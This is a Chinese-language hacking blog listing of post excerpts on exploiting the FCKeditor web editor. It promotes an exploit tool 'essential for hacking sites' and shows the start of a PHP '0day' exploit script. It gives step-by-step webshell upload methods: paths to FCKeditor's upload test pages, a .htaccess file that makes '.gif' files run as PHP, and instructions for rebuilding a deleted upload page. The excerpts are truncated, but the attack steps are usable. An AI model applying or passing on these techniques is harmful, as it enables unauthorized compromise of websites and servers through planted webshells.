FCK编辑器漏洞综合利用工具

分类:工具 | 2014-04-14 | 撸过 3,439 次
1人扯谈

国内fck编辑器太多了,每次动手复制粘贴,复制粘贴。非常麻烦。

此工具功能齐全。撸站必备工具。

20131102011138

下载地址:FCK编辑器漏洞综合利用工具

FCKeditor-Exp通杀0day

分类:安全 | 2012-04-19 | 撸过 1,681 次
1人扯谈

 

FCKeditor-Exp

来源与www.x7z.org

Botak_XH Q493499867

----------------------------------------------------------------------------------

<?php

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

$match = array();

func[......]

继续阅读

解决Fckeditor删除所有上传页面如何上传

分类:安全 | 2011-12-17 | 撸过 2,136 次
0人扯谈

 

首先,你得确定下Fckeditor的版本。

 

/FCKeditor/editor/dialog/fck_about.html

 

其次,你确定下以下几个上传页面是否真的被删除了呢?

 

/FCKeditor/editor/filemanager/browser/default/browser.html

/FCKeditor/editor/filemanager/browser/default/connectors/test.html

/FCKeditor/editor/filemanager/upload/test.html

/[......]

继续阅读

FCKeditor上传Getshell不要忘记htaccess

分类:安全 | 2011-09-25 | 撸过 684 次
0人扯谈

有些服务器开启了.htaccess文件上传,那么经常碰到fckeditor的就可以利用该文件上传一个phpshell。

1.创建一个.htaccess文件,内容如下:

 

<FilesMatch "_php.gif">

SetHandler application/x-httpd-php

</FilesMatch>

 

 

2.上传shell

http://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/file[......]

继续阅读

Fckeditor本地TEST.HTML

分类:安全 | 2011-09-3 | 撸过 623 次
1人扯谈

自从以前暴了TEST.HTML的上传0day以后,好多站长们多把TEST.HTML给删了。可是上传的

文件没删。这样的话可以自己在构造一个。下面是俺收集的。

把以下代码保存成TEST.HTML就行了。然后修改里面的上传文件。

<!--
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms[......]

继续阅读

FCKeditor编辑器全部版本另类上传漏洞

分类:安全 | 2011-08-26 | 撸过 704 次
0人扯谈

利用步骤:
1.创建一个htaccess文件:
代码内容:

SetHandler application/x-httpd-php

2.实用编辑器上传htaccess文件.

http://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html

https://www.webshell.cc/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shel[......]

继续阅读